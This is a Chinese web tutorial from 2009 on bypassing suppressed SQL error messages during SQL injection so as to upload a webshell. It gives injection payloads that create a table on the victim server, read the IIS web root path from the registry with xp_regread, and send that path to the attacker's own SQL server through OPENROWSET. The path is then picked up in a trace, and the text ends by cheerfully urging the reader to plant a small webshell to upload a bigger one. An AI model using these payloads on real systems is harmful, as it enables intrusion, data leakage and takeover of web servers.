当前位置: 首页 > 图文教程 > 服务器 > 安全防护 > 突破SQL错误提示上传webshell

安全防护
Microsoft Windows 2000 Server FSO 安全隐患解决办法
Win2003自带防火墙构筑安全防线
保护(IIS)web服务器的15个技巧
ftp服务程序不安全因素研究
自我防护Web站点和恶意链接的方法
建立安全的Web站点
增强Web的安全性
IIS存在未明远程攻击漏洞
Web服务器记录中查找黑客踪迹
浅析中小网站如何对付DoS(拒绝服务)攻击
系统安全-Win2000 Server入侵监测
网管员训练营--让Windows FTP服务器更安全
在Linux系统中如何用防火墙伪装抵挡黑客攻击
高手进阶 巧改设置强化3389入侵
服务器如何防范asp木马
入侵NTserver典型途径攻击基础
防范Windows消息钩子的侵入
巧妙配合asp木马取得管理权限
怎样防止别人用ipc$和默认共享入侵
教你如何:入侵UNIX和Linux服务器入门

安全防护 中的 突破SQL错误提示上传webshell


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-29   浏览: 36 ::
收藏到网摘: n/a

得到SQL注入点,首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个PP马了.
联想到一个权限不是很高的命令openrowset,进行跨库服务器查询,就是把一个SQL命令发送到远程数据库,然后看返回的结果,但是要启动事件跟踪!我们可以把网站信息写入数据库,然后%$^%$@#$@^%$~
首先在自己机器建立SQL数据库

然后在对方机器上建立个表 create table [dbo].[fenggou]([cha8][char](255))--

在对方执行 DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('SELECT a.* FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密码'', ''SELECT * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--

这样fenggou这个表里就会有这样一条记录SELECT a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密码', 'SELECT * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

不用说,''D:\WEB"就是从注册表里读出的物理路径拉.然后执行DECLARE @a1 char(255) set @a1=(SELECT cha8 FROM fenggou) exec (@a1);--

等于执行了SELECT a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密码', 'SELECT * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

OK,这时你在你机器上SQL事件追踪器上就会显示SELECT * FROM pubs.dbo.authors where au_fname='D:\WEB,,1'
哇 哈哈哈哈哈 物理路径到手了 写小马传大马吧~
PS:如果出错的话转换为16进制试试哈.以上是在偶渗透失败,无奈的时候想的办法,也许高人早就知道了吧,笑过~